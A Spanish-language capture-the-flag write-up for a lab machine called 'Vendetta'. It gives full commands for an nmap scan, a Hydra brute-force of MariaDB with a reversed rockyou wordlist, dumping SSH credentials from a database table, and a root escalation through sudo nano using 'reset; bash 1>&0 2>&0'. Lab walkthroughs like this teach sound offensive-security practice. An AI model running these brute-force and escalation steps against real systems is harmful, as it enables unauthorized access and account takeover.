> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/vendetta-write-up.md).

# Vendetta write-up

## **Verificamos conexión con la máquina víctima**

<figure><img src="/files/dy7RouTbQCYdFmn1pfAi" alt=""><figcaption></figcaption></figure>

## **Realizamos un escaneo de puertos abiertos de la máquina víctima**

Utilizamos la **Nmap** para escanear los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -O -Pn -n 172.17.0.2
```

<figure><img src="/files/QRUzCVrbXUMZODEkG2sM" alt=""><figcaption></figcaption></figure>

El escaneo indica que el puerto 22 (SSH), 80 (HTTP) y el 3306 (MariaDB) están abiertos. Así que pones la IP de la máquina víctima en el navegador y vemos que la letra `V` esta resaltada indicando un posible usuario.

<figure><img src="/files/hFwFytWvXW2xm6KOoX7S" alt=""><figcaption></figcaption></figure>

Así que lo que vamos a hacer es un ataque de fuerza bruta con **Hydra** al servicio **MariaDB**, pero primero lo que tenemos que hacer es darle la vuelta al rockyou, ya que la contraseña está por el final, así que usamos la herramienta **Tac** para darle la vuelta con el siguiente comando:

```bash
tac rockyou.txt > rockyou2.txt
```

Una vez hecho esto tenemos que quitar los espacios, las lineas en blanco y otros caracteres para que funciones del `rockyou2.txt` con el siguiente comando:

```bash
sed -i -e 's/ //g' -e '/^$/d' -e 's/\x03//g' -e 's/\x04//g' -e 's/\x08//g' -e 's/\x1a//g' rockyou2.txt
```

Ahora creamos un fichero llamado `usuarios.txt` y ponemos como posibles usuarios `v` y `V`.

<figure><img src="/files/wyfAIbFgKA5nxw0rvzrD" alt=""><figcaption></figcaption></figure>

Ahora una vez hecho esto hacemos el ataque de fuerza bruta con el siguiente comando:

```bash
hydra -L usuarios.txt -P /home/shinki/Escritorio/rockyou2.txt -I -u mysql://172.17.0.2 
```

<figure><img src="/files/b5k8wpYhjAfg9wkCkzym" alt=""><figcaption></figcaption></figure>

Esto nos devuelve que la contraseña de la base de datos **MariaDB** es `ie168` y su usuario es `V`.

Si al intentar hacer el ataque se bloquea tu IP, debes introducir los siguientes comandos para poder volver a hacer el ataque:

```bash
sudo docker ps

sudo docker restart <CONTAINER ID> 
```

<figure><img src="/files/73ap7z9NVYZ2cbq6REtz" alt=""><figcaption></figcaption></figure>

Así que ahora iniciamos sesión con las credenciales que descubrimos anterior mente con el siguiente comando:

```bash
mysql -h 172.17.0.2 -u V -p --skip-ssl
```

<figure><img src="/files/Xp8HrdxnknBc54LxJJKg" alt=""><figcaption></figcaption></figure>

Ahora nos tendríamos que ir moviendo por la base de datos de la siguiente manera. Primero ejecutamos `show databases;` y vemos que la única que no se crea de forma predeterminada es `BTN`, así que ahora ejecutamos `use BTN;` y después ejecutamos el comando `show tables;` y vemos la tabla **users**, así que solo nos queda poner el comando `SELECT * FROM users;` y nos mostraría el usuario `Vendetta` y la contraseña `OldBailey`. Por lo que solo quedaría acceder al servicio SSH.

<figure><img src="/files/ZeXXWKdkHP32ab4Lymz4" alt=""><figcaption></figcaption></figure>

## **Intrusión en la máquina víctima**

Una vez dentro ejecutamos el comando `sudo -l` el cual nos indica que podemos ejecutar el binario `nano` como cualquier usuario sin necesidad de contraseña.

<figure><img src="/files/EFXHLzQ0EKDRwGX97efg" alt=""><figcaption></figcaption></figure>

Así que ejecutamos nano como root de la siguiente manera:

```bash
sudo /usr/bin/nano archivo
```

Y ahora presionamos la teclas `Ctrl + R` y luego `Ctrl + X` y finalizamos escribiendo el siguiente comando:

```bash
reset; bash 1>&0 2>&0
```

Y ya tendríamos permisos root.

<figure><img src="/files/P5GuWKLB9LAJUCewTOWR" alt=""><figcaption></figcaption></figure>
